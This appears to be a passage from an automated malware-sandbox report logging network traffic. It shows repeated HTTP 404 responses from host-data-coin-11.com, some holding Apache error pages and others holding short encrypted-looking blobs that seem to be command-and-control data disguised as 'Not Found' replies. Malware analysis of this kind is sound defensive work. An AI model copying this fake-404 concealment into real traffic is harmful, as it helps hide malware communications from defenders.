75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
